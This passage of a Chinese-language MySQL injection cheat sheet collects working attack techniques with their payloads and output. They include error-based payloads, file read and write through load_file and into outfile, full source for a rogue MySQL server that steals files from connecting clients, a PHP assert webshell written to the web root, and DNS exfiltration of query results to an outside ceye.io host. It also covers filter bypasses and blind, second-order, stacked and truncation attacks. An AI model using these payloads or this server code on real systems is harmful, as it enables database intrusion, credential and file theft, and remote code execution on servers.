引自:——Mysql报错注入原理分析(count()、rand()、group by)
payload用法: union select count(*),2,concat(':',(select database()),':',floor(rand()*2))as a from information_schema.tables group by a
5.几何函数
  • GeometryCollection:id=1 AND GeometryCollection((select * from (select* from(select user())a)b))
  • polygon():id=1 AND polygon((select * from(select * from(select user())a)b))
  • multipoint():id=1 AND multipoint((select * from(select * from(select user())a)b))
  • multilinestring():id=1 AND multilinestring((select * from(select * from(select user())a)b))
  • linestring():id=1 AND LINESTRING((select * from(select * from(select user())a)b))
  • multipolygon() :id=1 AND multipolygon((select * from(select * from(select user())a)b))
6.不存在的函数
随便适用一颗不存在的函数,可能会得到当前所在的数据库名称。例如:
1
2
mysql> select a();
ERROR 1305 (42000): FUNCTION shopping1.a does not exist
7.Bigint数值操作:
当mysql数据库的某些边界数值进行数值运算时,会报错的原理。
如~0得到的结果:18446744073709551615
若此数参与运算,则很容易会错误。
payload: select !(select * from(select user())a)-~0;
8.name_const()
仅可取数据库版本信息
payload: select * from(select name_const(version(),0x1),name_const(version(),0x1))a
9.uuid相关函数
适用版本:8.0.x
参数格式不正确。
1
2
mysql> SELECT UUID_TO_BIN((SELECT password FROM users WHERE id=1));
mysql> SELECT BIN_TO_UUID((SELECT password FROM users WHERE id=1));
10.join using()注列名
通过系统关键词join可建立两个表之间的内连接。
通过对想要查询列名的表与其自身建议内连接,会由于冗余的原因(相同列名存在),而发生错误。
并且报错信息会存在重复的列名,可以使用 USING 表达式声明内连接(INNER JOIN)条件来避免报错。
1
2
3
mysql>select * from(select * from users a join (select * from users)b)c;
mysql>select * from(select * from users a join (select * from users)b using(username))c;
mysql>select * from(select * from users a join (select * from users)b using(username,password))c
11.GTID相关函数
参数格式不正确。
1
2
3
mysql>select gtid_subset(user(),1);
mysql>select gtid_subset(hex(substr((select * from users limit 1,1),1,1)),1);
mysql>select gtid_subtract((select * from(select user())a),1);
例如:
1
2
3
4
5
6
mysql> select gtid_subset(user(),1);
ERROR 1772 (HY000): Malformed GTID set specification 'root@localhost'.
mysql> select gtid_subset(hex(substr((select * from users limit 1,1),1,1)),1);
ERROR 1241 (21000): Operand should contain 1 column(s)
mysql> select gtid_subtract((select * from(select user())a),1);
ERROR 1772 (HY000): Malformed GTID set specification 'root@localhost'.
12.报错函数速查表
注:默认MYSQL_ERRMSG_SIZE=512
类别 函数 版本需求 5.5.x 5.6.x 5.7.x 8.x 函数显错长度 Mysql报错内容长度 额外限制
主键重复 floor round 64 data_type ≠ varchar
列名重复 name_const only version()
列名重复 join [5.5.49, ?) only columns
数据溢出 - Double 1e308 cot exp pow [5.5.5, 5.5.48] MYSQL_ERRMSG_SIZE
数据溢出 - BIGINT 1+~0 [5.5.5, 5.5.48] MYSQL_ERRMSG_SIZE
几何对象 geometrycollection linestring multipoint multipolygon multilinestring polygon [?, 5.5.48] 244
空间函数 Geohash ST_LatFromGeoHash ST_LongFromGeoHash ST_PointFromGeoHash [5.7, ?) 128
GTID gtid_subset gtid_subtract [5.6.5, ?) 200
JSON json_* [5.7.8, 5.7.11] 200
UUID uuid_to_bin bin_to_uuid [8.0, ?) 128
XPath extractvalue updatexml [5.1.5, ?) 32
摘自——Mysql 注入基础小结

0x07.文件读/写

我们知道Mysql是很灵活的,它支持文件读/写功能。在讲这之前,有必要介绍下什么是file_privsecure-file-priv
file_pric是对于用户的文件读写权限,若无权限则不能进行文件读写操作,可通过下面的payload查看权限。
1
select file_priv from mysql.user where user=$USER host=$HOST;
例如:
1
2
3
4
5
6
7
mysql> select file_priv from mysql.user where user='root' and host='localhost';
+-----------+
| file_priv |
+-----------+
| Y |
+-----------+
1 row in set (0.00 sec)
secure-file-priv是一个系统变量,对于文件读/写功能进行限制。具体如下:
  • 无内容,表示无限制。
  • 为NULL,表示禁止文件读/写。
  • 为目录名,表示仅允许对特定目录的文件进行读/写。
注:5.5.53本身及之后的版本默认值为NULL,之前的版本无内容。
三种方法查看当前secure-file-priv的值:
1
2
3
select @@secure_file_priv;
select @@global.secure_file_priv;
show variables like "secure_file_priv";
例如:
1
2
3
4
5
6
7
mysql> select @@secure_file_priv;
+--------------------+
| @@secure_file_priv |
+--------------------+
| NULL |
+--------------------+
1 row in set (0.00 sec)
修改:
  • 通过修改my.ini文件,添加:secure-file-priv=
  • 启动项添加参数:mysqld.exe --secure-file-priv=
my.ini中设置读写权限。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
[client]
# 设置mysql客户端默认字符集
default-character-set=utf8

[mysqld]
loose-local-infile = 1
secure-file-priv=
# 设置3306端口
port = 3306
# 设置mysql的安装目录
basedir=D:\\mysql-8.0.18
# 设置 mysql数据库的数据的存放目录,MySQL 8+ 不需要以下配置,系统自己生成即可,否则有可能报错
# datadir=C:\\web\\sqldata
# password=-6FlP)yKb3js
# 允许最大连接数
max_connections=20
# 服务端使用的字符集默认为8比特编码的latin1字符集
character-set-server=utf8
# 创建新表时将使用的默认存储引擎
default-storage-engine=INNODB
Mysql读取文件通常使用load_file函数,语法如下:
1
select load_file(file_path);
例如:
1
2
3
4
5
6
7
mysql> select load_file('C:/Users/liangjie/Desktop/flag.txt');
+-------------------------------------------------+
| load_file('C:/Users/liangjie/Desktop/flag.txt') |
+-------------------------------------------------+
| flag{ljdd520} |
+-------------------------------------------------+
1 row in set (0.00 sec)
注:在输入文件的绝对路径的时候,要用/来替换\,由于在mysql种\会被当做转换符来处理。
读第二种读取文件的方法:
1
load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n'; #读取服务端文件
例如:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
mysql> CREATE TABLE IF NOT EXISTS `test`(
-> `id` INT UNSIGNED AUTO_INCREMENT,
-> `content` VARCHAR(100) NOT NULL,
-> PRIMARY KEY ( `id` )
-> )ENGINE=InnoDB DEFAULT CHARSET=utf8;
Query OK, 0 rows affected, 1 warning (0.03 sec)

mysql> load data infile "C:/Users/liangjie/Desktop/flag.txt" into table test FIELDS TERMINATED BY ',';
Query OK, 2 rows affected (0.01 sec)
Records: 2 Deleted: 0 Skipped: 0 Warnings: 0

mysql> select *from test;
+----+----------------+
| id | content |
+----+----------------+
| 1 | flag{ljdd520}
| 2 | flag{lydd520} |
+----+----------------+
2 rows in set (0.00 sec)
参考链接
https://blog.csdn.net/u014082714/article/details/53173975
第三种读取文件的方法:
1
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n'; #读取客户端文件
例如:
1
2
3
4
5
6
7
8
9
10
11
12
13
mysql> load data local infile "C:/Users/liangjie/Desktop/flag.txt" into table test FIELDS TERMINATED BY ',';
Query OK, 1 row affected, 2 warnings (0.01 sec)
Records: 3 Deleted: 0 Skipped: 2 Warnings: 2

mysql> select * from test;
+----+----------------+
| id | content |
+----+----------------+
| 1 | flag{ljdd520}
| 2 | flag{lydd520} |
| 3 | flag{ludd520} |
+----+----------------+
3 rows in set (0.00 sec)
限制:
  • 前两种需要secure-file-priv无值或为有利目录。
  • 都需要知道要读取的文件所在的绝对路径。
  • 要读取的文件大小必须小于max_allowed_packet所设置的值
低权限读取文件
5.5.53secure-file-priv=NULL读文件payload,mysql8测试失败(需要开启读写的权限),其他版本自测。
1
2
3
4
drop table mysql.m1;
CREATE TABLE mysql.m1 (code TEXT );
LOAD DATA LOCAL INFILE 'D://1.txt' INTO TABLE mysql.m1 fields terminated by '';
select * from mysql.m1;
Mysql连接数据库时可读取文件
这个漏洞是mysql的一个特性产生的,是上述的第三种读文件的方法为基础的。
简单描述该漏洞:Mysql客户端在执行load data local语句的时,先想mysql服务端发送请求,服务端接收到请求,并返回需要读取的文件地址,客户端接收该地址并进行读取,接着将读取到的内容发送给服务端。用通俗的语言可以描述如下:
原本的查询流程为
1
2
3
客户端:我要把我的win.ini文件内容插入test表中
服务端:好,我要你的win.ini文件内容
客户端:win.ini的内容如下....

####### 假设服务端由我们控制,把一个正常的流程篡改成如下

1
2
3
客户端:我要把我的win.ini文件内容插入test表中
服务端:好,我要你的conn.php内容
客户端:conn.php的内容如下???
例子部分修改自:CSS-T | Mysql Client 任意文件读取攻击链拓展
换句话说:load data local语句要读取的文件会受到服务端的控制。
其次,在Mysql官方文档对于load data local语句的安全说明中有这么一句话:
A patched server could in fact reply with a file-transfer request to any statement, not justLOAD DATA LOCAL, so a more fundamental issue is that clients should not connect to untrusted servers.
意思是:服务器对客户端的文件读取请求实际上是可以返回给客户端发送给服务端的任意语句请求的,不仅仅只是load data local语句。
这就会产生什么结果呢?之前讲的例子,将可以变成:
1
2
3
客户端:我需要查询test表下的xx内容
服务端:我需要你的conn.php内容
客户端:conn.php的内容如下???
可以看到,客户端相当于被攻击者给半劫持了。
利用上述的特性,我们通过构造一个恶意的服务端,即可完成上述的过程。
简易恶意服务端代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
#代码摘自:https://github.com/Gifts/Rogue-MySql-Server/blob/master/rogue_mysql_server.py
#!/usr/bin/env python
#coding: utf8

import socket
import asyncore
import asynchat
import struct
import random
import logging
import logging.handlers

PORT = 3306
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab')
tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s"))
log.addHandler(
tmp_format
)

filelist = (
# r'c:\boot.ini',
r'c:\windows\win.ini',
# r'c:\windows\system32\drivers\etc\hosts',
# '/etc/passwd',
# '/etc/shadow',
)

#================================================
#=======No need to change after this lines=======
#================================================

__author__ = 'Gifts'

def daemonize():
import os, warnings
if os.name != 'posix':
warnings.warn('Cant create daemon on non-posix system')
return

if os.fork(): os._exit(0)
os.setsid()
if os.fork(): os._exit(0)
os.umask(0o022)
null=os.open('/dev/null', os.O_RDWR)
for i in xrange(3):
try:
os.dup2(null, i)
except OSError as e:
if e.errno != 9: raise
os.close(null)

class LastPacket(Exception):
pass

class OutOfOrder(Exception):
pass

class mysql_packet(object):
packet_header = struct.Struct('<Hbb')
packet_header_long = struct.Struct('<Hbbb')
def __init__(self, packet_type, payload):
if isinstance(packet_type, mysql_packet):
self.packet_num = packet_type.packet_num + 1
else:
self.packet_num = packet_type
self.payload = payload

def __str__(self):
payload_len = len(self.payload)
if payload_len < 65536:
header = mysql_packet.packet_header.pack(payload_len, 0, self.packet_num)
else:
header = mysql_packet.packet_header.pack(payload_len & 0xFFFF, payload_len >> 16, 0, self.packet_num)

result = "{0}{1}".format(
header,
self.payload
)
return result

def __repr__(self):
return repr(str(self))

@staticmethod
def parse(raw_data):
packet_num = ord(raw_data[0])
payload = raw_data[1:]

return mysql_packet(packet_num, payload)

class http_request_handler(asynchat.async_chat):

def __init__(self, addr):
asynchat.async_chat.__init__(self, sock=addr[0])
self.addr = addr[1]
self.ibuffer = []
self.set_terminator(3)
self.state = 'LEN'
self.sub_state = 'Auth'
self.logined = False
self.push(
mysql_packet(
0,
"".join((
'\x0a', # Protocol
'3.0.0-Evil_Mysql_Server' + '\0', # Version
#'5.1.66-0+squeeze1' + '\0',
'\x36\x00\x00\x00', # Thread ID
'evilsalt' + '\0', # Salt
'\xdf\xf7', # Capabilities
'\x08', # Collation
'\x02\x00', # Server Status
'\0' * 13, # Unknown
'evil2222' + '\0',
))
)
)

self.order = 1
self.states = ['LOGIN', 'CAPS', 'ANY']

def push(self, data):
log.debug('Pushed: %r', data)
data = str(data)
asynchat.async_chat.push(self, data)

def collect_incoming_data(self, data):
log.debug('Data recved: %r', data)
self.ibuffer.append(data)

def found_terminator(self):
data = "".join(self.ibuffer)
self.ibuffer = []

if self.state == 'LEN':
len_bytes = ord(data[0]) + 256*ord(data[1]) + 65536*ord(data[2]) + 1
if len_bytes < 65536:
self.set_terminator(len_bytes)
self.state = 'Data'
else:
self.state = 'MoreLength'
elif self.state == 'MoreLength':
if data[0] != '\0':
self.push(None)
self.close_when_done()
else:
self.state = 'Data'
elif self.state == 'Data':
packet = mysql_packet.parse(data)
try:
if self.order != packet.packet_num:
raise OutOfOrder()
else:
# Fix ?
self.order = packet.packet_num + 2
if packet.packet_num == 0:
if packet.payload[0] == '\x03':
log.info('Query')

filename = random.choice(filelist)
PACKET = mysql_packet(
packet,
'\xFB{0}'.format(filename)
)
self.set_terminator(3)
self.state = 'LEN'
self.sub_state = 'File'
self.push(PACKET)
elif packet.payload[0] == '\x1b':
log.info('SelectDB')
self.push(mysql_packet(
packet,
'\xfe\x00\x00\x02\x00'
))
raise LastPacket()
elif packet.payload[0] in '\x02':
self.push(mysql_packet(
packet, '\0\0\0\x02\0\0\0'
))
raise LastPacket()
elif packet.payload == '\x00\x01':
self.push(None)
self.close_when_done()
else:
raise ValueError()
else:
if self.sub_state == 'File':
log.info('-- result')
log.info('Result: %r', data)

if len(data) == 1:
self.push(
mysql_packet(packet, '\0\0\0\x02\0\0\0')
)
raise LastPacket()
else:
self.set_terminator(3)
self.state = 'LEN'
self.order = packet.packet_num + 1

elif self.sub_state == 'Auth':
self.push(mysql_packet(
packet, '\0\0\0\x02\0\0\0'
))
raise LastPacket()
else:
log.info('-- else')
raise ValueError('Unknown packet')
except LastPacket:
log.info('Last packet')
self.state = 'LEN'
self.sub_state = None
self.order = 0
self.set_terminator(3)
except OutOfOrder:
log.warning('Out of order')
self.push(None)
self.close_when_done()
else:
log.error('Unknown state')
self.push('None')
self.close_when_done()

class mysql_listener(asyncore.dispatcher):
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)

if not sock:
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
try:
self.bind(('', PORT))
except socket.error:
exit()

self.listen(5)

def handle_accept(self):
pair = self.accept()

if pair is not None:
log.info('Conn from: %r', pair[1])
tmp = http_request_handler(pair)

z = mysql_listener()
daemonize()
asyncore.loop()
需要注意的是:这个过程需要客户端允许使用load data local才行,不过这个信息在客户端尝试连接到服务端的数据包中可以找到。

说完了读文件,那我们来说说mysql的写文件操作。常见的写文件操作如下:
1
2
select 1,"<?php @assert($_POST['t']);?>" into outfile '/var/www/html/1.php';
select 2,"<?php @assert($_POST['t']);?>" into dumpfile '/var/www/html/1.php';
例如:
1
2
3
4
5
6
7
8
9
10
mysql> select 1,",","<?php @assert($_POST['t']);?>" into dumpfile 'C:/Users/liangjie/flag.txt';
Query OK, 1 row affected (0.01 sec)

mysql> select load_file("C:/Users/liangjie/flag.txt");
+-----------------------------------------+
| load_file("C:/Users/liangjie/flag.txt") |
+-----------------------------------------+
| 1,<?php @assert($_POST['t']);?> |
+-----------------------------------------+
1 row in set (0.00 sec)
限制:
  • secure-file-priv无值或为可利用的目录
  • 需知道目标目录的绝对目录地址
  • 目标目录可写,mysql的权限足够。
日志法
由于mysql在5.5.53版本之后,secure-file-priv的值默认为NULL,这使得正常读取文件的操作基本不可行。我们这里可以利用mysql生成日志文件的方法来绕过。
mysql日志文件的一些相关设置可以直接通过命令来进行:
1
2
3
4
5
6
7
8
//请求日志
mysql> set global general_log_file = '/var/www/html/1.php';
mysql> set global general_log = on;
//慢查询日志
mysql> set global slow_query_log_file='/var/www/html/2.php'
mysql> set global slow_query_log=1;
//还有其他很多日志都可以进行利用
...
之后我们在让数据库执行满足记录条件的恶意语句即可。
限制:
  • 权限够,可以进行日志的设置操作
  • 知道目标目录的绝对路径

0x08.DNSLOG带出数据

什么是DNSLOG?简单的说,就是关于特定网站的DNS查询的一份记录表。若A用户对B网站进行访问/请求等操作,首先会去查询B网站的DNS记录,由于B网站是被我们控制的,便可以通过某些方法记录下A用户对于B网站的DNS记录信息。此方法也称为OOB注入。
如何用DNSLOG带出数据?若我们想要查询的数据为:aabbcc,那么我们让mysql服务端去请求aabbcc.evil.com,通过记录evil.com的DNS记录,就可以得到数据:aabbcc

引自:Dnslog在SQL注入中的实战
payload:load_file(concat('\\\\',(select user()),'.xxxx.ceye.io\xxxx'))
应用场景:
  • 三大注入无法使用
  • 有文件读取权限及secure-file-priv无值。
  • 不知道网站/目标文件/目标目录的绝对路径
  • 目标系统为Windows
推荐平台:ceye.io
为什么Windows可用,Linux不行?这里涉及到一个叫UNC的知识点。简单的说,在Windows中,路径以\\开头的路径在Windows中被定义为UNC路径,相当于网络硬盘一样的存在,所以我们填写域名的话,Windows会先进行DNS查询。但是对于Linux来说,并没有这一标准,所以DNSLOG在Linux环境不适用。注:payload里的四个\\\\中的两个\是用来进行转义处理的。

0x09.二次注入

什么是二次注入?简单的说,就是攻击者构造的恶意payload首先会被服务器存储在数据库中,在之后取出数据库在进行SQL语句拼接时产生的SQL注入问题。
举个例子,某个查询当先登录的用户信息的SQL语句如下:
1
select * from users where username='$_SESSION['username']'
登录/注册处的SQL语句都经过了addslashes函数、单引号闭合的处理,且无编码产生的问题。
对于上述举的语句我们可以先注册一个名为admin' #的用户名,因为在注册进行了单引号的转义,故我们并不能直接进行insert注入,最终将我们的用户名存储在了服务器中,注意:反斜杠转义掉了单引号,在mysql中得到的数据并没有反斜杠的存在。
在我们进行登录操作的时候,我们用注册的admin' #登录系统,并将用户部分数据存储在对于的SESSION中,如$_SESSION['username']
上述的$_SESSION['username']并没有经过处理,直接拼接到了SQL语句之中,就会造成SQL注入,最终的语句为:
1
select * from users where username='admin' #'

0x10.order by比较盲注

这种方法运用的情况比较极端一些,如布尔盲注时,字符截取/比较限制很严格。例子:
1
select * from users where (select 'r' union select user() order by 1 limit 1)='r'
实际上此处是利用了order by语句的排序功能来进行判断的。若我们想要查询的数据开头的首字母在字母表的位值比我们判断的值要靠后,则limit语句将不会让其输出,那么整个条件将会成立,否之不成立。
利用这种方法可以做到不需要使用like、rlike、regexp等匹配语句以及字符操作函数。
再举个例子:
1
select username,flag,password from users where username='$username;'
页面回显的字段为:username与password,如何在unionflag两单词被拦截、无报错信息返回的情况下获取到用户名为admin的flag值?
我们前边讲到了无列名注入,通过使用union语句来对未知列名进行重命名的形式绕过,还讲过通过使用join using()报错注入出列名。但现在,这两种方法都不可以的情况下该如何获取到flag字段的内容?
使用order by可轻松盲注出答案。payload:
1
select username,flag,password from users where username='admin' union select 1,'a',3 order by 2
与之前的原理相同,通过判断前后两个select语句返回的数据前后顺序来进行盲注。

0x11.常见函数/符号归类

注释符
单行注释 单行注释 单行注释 多行(内联)注释
# -- x //x为任意字符 ;%00 /*任意内容*/
常用运算符
运算符 说明 运算符 说明
&& 与,同and。 | | 或,同or。
! 非,同not。 ~ 一元比特反转。
^ 异或,同xor。 + 加,可替代空格,如select+user()
系统信息函数
函数 说明
USER() 获取当前操作句柄的用户名,同SESSION_USER()、CURRENT_USER(),有时也用SYSTEM_USER()。
DATABASE() 获取当前选择的数据库名,同SCHEMA()。
VERSION() 获取当前版本信息。
进制转换
函数 说明
ORD(str) 返回字符串第一个字符的ASCII值。
OCT(N) 以字符串形式返回 N 的八进制数,N 是一个BIGINT 型数值,作用相当于CONV(N,10,8)
HEX(N_S) 参数为字符串时,返回 N_or_S 的16进制字符串形式,为数字时,返回其16进制数形式。
UNHEX(str) HEX(str) 的逆向函数。将参数中的每一对16进制数字都转换为10进制数字,然后再转换成 ASCII 码所对应的字符。
BIN(N) 返回十进制数值 N 的二进制数值的字符串表现形式。
ASCII(str) ORD(string)
CONV(N,from_base,to_base) 将数值型参数N由初始进制from_base转换为目标进制to_base的形式并返回。
CHAR(N,… [USING charset_name]) 将每一个参数N都解释为整数,返回由这些整数在 ASCII 码中所对应字符所组成的字符串。
字符截取/拼接
函数 说明
SUBSTR(str,N_start,N_length) 对指定字符串进行截取,为SUBSTRING的简单版。
SUBSTRING() 多种格式SUBSTRING(str,pos)、SUBSTRING(str FROM pos)、SUBSTRING(str,pos,len)、SUBSTRING(str FROM pos FOR len)
RIGHT(str,len) 对指定字符串从最右边截取指定长度。
LEFT(str,len) 对指定字符串从最左边截取指定长度。
RPAD(str,len,padstr) str 右方补齐 len 位的字符串 padstr,返回新字符串。如果 str 长度大于 len,则返回值的长度将缩减到 len 所指定的长度。
LPAD(str,len,padstr) 与RPAD相似,在str左边补齐。
MID(str,pos,len) 同于 SUBSTRING(str,pos,len)
INSERT(str,pos,len,newstr) 在原始字符串 str 中,将自左数第 pos 位开始,长度为 len 个字符的字符串替换为新字符串 newstr,然后返回经过替换后的字符串。INSERT(str,len,1,0x0)可当做截取函数。
CONCAT(str1,str2…) 函数用于将多个字符串合并为一个字符串
GROUP_CONCAT(…) 返回一个字符串结果,该结果由分组中的值连接组合而成。
MAKE_SET(bits,str1,str2,…) 根据参数1,返回所输入其他的参数值。可用作布尔盲注,如:EXP(MAKE_SET((LENGTH(DATABASE())>8)+1,'1','710'))
常见全局变量
变量 说明 变量 说明
@@VERSION 返回版本信息 @@HOSTNAME 返回安装的计算机名称
@@GLOBAL.VERSION @@VERSION @@BASEDIR 返回MYSQL绝对路径
PS:查看全部全局变量SHOW GLOBAL VARIABLES;
其他常用函数/语句
函数/语句 说明
LENGTH(str) 返回字符串的长度。
PI() 返回π的具体数值。
REGEXP “statement” 正则匹配数据,返回值为布尔值。
LIKE “statement” 匹配数据,%代表任意内容。返回值为布尔值。
RLIKE “statement” 与regexp相同。
LOCATE(substr,str,[pos]) 返回子字符串第一次出现的位置。
POSITION(substr IN str) 等同于 LOCATE()
LOWER(str) 将字符串的大写字母全部转成小写。同:LCASE(str)
UPPER(str) 将字符串的小写字母全部转成大写。同:UCASE(str)
ELT(N,str1,str2,str3,…) MAKE_SET(bit,str1,str2...)类似,根据N返回参数值。
NULLIF(expr1,expr2) 若expr1与expr2相同,则返回expr1,否则返回NULL。
CHARSET(str) 返回字符串使用的字符集。
DECODE(crypt_str,pass_str) 使用 pass_str 作为密码,解密加密字符串 crypt_str。加密函数:ENCODE(str,pass_str)

0x12.约束攻击

什么是约束攻击?
仍然是先举个例子:
我们先通过下列语句建立一个用户表
1
2
3
4
CREATE TABLE users(
username varchar(20),
password varchar(20)
)
注册代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
$conn = mysqli_connect("127.0.0.1:3306", "root", "ljdd520", "db");
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
$username = addslashes(@$_POST['username']);
$password = addslashes(@$_POST['password']);
$sql = "select * from users where username = '$username'";
$rs = mysqli_query($conn,$sql);
if($rs->fetch_row()){
die('账号已注册');
}else{
$sql2 = "insert into users values('$username','$password')";
mysqli_query($conn,$sql2);
die('注册成功');
}
?>
登录判断代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
$conn = mysqli_connect("127.0.0.1:3306", "root", "ljdd520", "db");
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
$username = addslashes(@$_POST['username']);
$password = addslashes(@$_POST['password']);
$sql = "select * from users where username = '$username' and password='$password';";
$rs = mysqli_query($conn,$sql);
if($rs->fetch_row()){
$_SESSION['username']=$password;
}else{
echo "fail";
}
?>
在无编码问题,且进行了单引号的处理情况下仍可能发生什么SQL注入问题呢?
我们注意到,前边创建表格的语句限制了username和password的长度最大为25,若我们插入数据超过25,MYSQL会怎样处理呢?答案是MYSQL会截取前边的25个字符进行插入。
而对于SELECT查询请求,若查询的数据超过25长度,也不会进行截取操作,这就产生了一个问题。
通常对于注册处的代码来说,需要先判断注册的用户名是否存在,再进行插入数据操作。如我们注册一个username=admin[25个空格]x&password=123456的账号,服务器会先查询admin[25个空格]x的用户是否存在,若存在,则不能注册。若不存在,则进行插入数据的操作。而此处我们限制了username与password字段长度最大为25,所以我们实际插入的数据为username=admin[20个空格]&password=123456
接着进行登录的时,我们使用:username=admin&password=123456进行登录,即可成功登录admin的账号。
例如:
1
2
3
4
5
6
7
mysql> select 'admin'='admin                    ';
+-------------------------------------+
| 'admin'='admin ' |
+-------------------------------------+
| 1 |
+-------------------------------------+
1 row in set (0.00 sec)
防御:
  • 给username字段添加unique属性。
  • 使用id字段作为判断用户的凭证。
  • 插入数据前判断数据长度。

0x13.堆叠注入

简单的说,由于分号;为MYSQL语句的结束符。若在支持多语句执行的情况下,可利用此方法执行其他恶意语句,如RENAMEDROP等。
注意,通常多语句执行时,若前条语句已返回数据,则之后的语句返回的数据通常无法返回前端页面。建议使用union联合注入,若无法使用联合注入, 可考虑使用RENAME关键字,将想要的数据列名/表名更改成返回数据的SQL语句所定义的表/列名 。具体参考:2019强网杯——随便注Writeup
PHP中堆叠注入的支持情况:
Mysqli PDO MySQL
引入的PHP版本 5.0 5.0 3.0之前
PHP5.x是否包含
多语句执行支持情况 大多数
引自:PDO场景下的SQL注入探究

0x14.handler语句代替select查询

mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。
语法结构:
1
2
3
4
5
6
7
8
9
10
HANDLER tbl_name OPEN [ [AS] alias]

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
[ WHERE where_condition ] [LIMIT ... ]

HANDLER tbl_name CLOSE
如:通过handler语句查询users表的内容
1
2
3
4
5
6
handler users open as yunensec; #指定数据表进行载入并将返回句柄重命名
handler yunensec read first; #读取指定表/句柄的首行数据
handler yunensec read next; #读取指定表/句柄的下一行数据
handler yunensec read next; #读取指定表/句柄的下一行数据
...
handler yunensec close; #关闭句柄

0x15.一些小Trick

这里跟大家分享一些有意思的Trick,主要在一些CTF题出现,这里也把它记下来,方便复习。
PHP/union.+?select/ig绕过。
在某些题目中,题目禁止union与select同时出现时,会用此正则来判断输入数据。
PHP为了防止正则表达式的拒绝服务攻击(reDOS),给pcre设定了一个回溯次数上限pcre.backtrack_limit。若我们输入的数据使得PHP进行回溯且此数超过了规定的回溯上限此数(默认为 100万),那么正则停止,返回未匹配到数据。
故而我们构造payload:union/*100万个a,充当垃圾数据*/select即可绕过正则判断。
一道相关的CTF题:TetCTF-2020 WP BY MrR3boot

0x16.无列名盲注

前边提到了,在知道表名,不知道列名的情况下,我们可以利用union来给未知列名“重命名”,还可以利用报错函数来注入出列名。现在,除了之前的order by盲注之外,这里再提一种新的方法,直接通过select进行盲注。
核心payload:(select 'admin','admin')>(select * from users limit 1)
子查询之间也可以直接通过>、<、=来进行判断。
例如:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
mysql> select *from test limit 1;
+----+----------------+
| id | content |
+----+----------------+
| 1 | flag{ljdd520}
+----+----------------+
1 row in set (0.00 sec)

mysql> select (select 1,'flag{ljdd520}')>(select * from test limit 1);
+---------------------------------------------------------+
| (select 1,'flag{ljdd520}')>(select * from test limit 1) |
+---------------------------------------------------------+
| 1 |
+---------------------------------------------------------+
1 row in set (0.00 sec)

mysql> select (select 1,'flag{ljdd5201}')>(select * from test limit 1);
+----------------------------------------------------------+
| (select 1,'flag{ljdd5201}')>(select * from test limit 1) |
+----------------------------------------------------------+
| 0 |
+----------------------------------------------------------+
1 row in set (0.00 sec)

0x17.UPDATE注入重复字段赋值

即:UPDATA table_name set field1=new_value,field1=new_value2 [where],最终field1字段的内容为new_value2,可用这个特性来进行UPDATA注入。如:
1
UPDATE table_name set field1=new_value,field1=(select user()) [where]

0x18.LIMIT之后的字段数判断

我们都知道若注入点在where子语句之后,判断字段数可以用order bygroup by来进行判断,而limit后可以利用 into @,@ 判断字段数,其中@为mysql临时变量。

例如:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
mysql> select *from test;
+----+----------------+
| id | content |
+----+----------------+
| 1 | flag{ljdd520}
| 2 | flag{lydd520} |
| 3 | flag{ludd520} |
| 4 | admin' # |
+----+----------------+
4 rows in set (0.00 sec)

mysql> select *from test where content like 'a%' limit 1,1 into @,@;
Query OK, 0 rows affected, 1 warning (0.01 sec)

mysql> select *from test where content like 'a%' limit 1,1 into @;
ERROR 1222 (21000): The used SELECT statements have a different number of columns

0x19.sys系统库

1
2
3
4
5
6
7
8
9
10
11
12
#查询所有的库:
SELECT table_schema FROM sys.schema_table_statistics GROUP BY table_schema;
SELECT table_schema FROM sys.x$schema_flattened_keys GROUP BY table_schema;
#查询指定库的表(若无则说明此表从未被访问):
SELECT table_name FROM sys.schema_table_statistics WHERE table_schema='mspwd' GROUP BY table_name;
SELECT table_name FROM sys.x$schema_flattened_keys WHERE table_schema='mspwd' GROUP BY table_name;
#统计所有访问过的表次数:库名,表名,访问次数
select table_schema,table_name,sum(io_read_requests+io_write_requests) io from sys.schema_table_statistics group by table_schema,table_name order by io desc;
#查看所有正在连接的用户详细信息:连接的用户(连接的用户名,连接的ip),当前库,用户状态(Sleep就是空闲),现在在执行的sql语句,上一次执行的sql语句,已经建立连接的时间(秒)
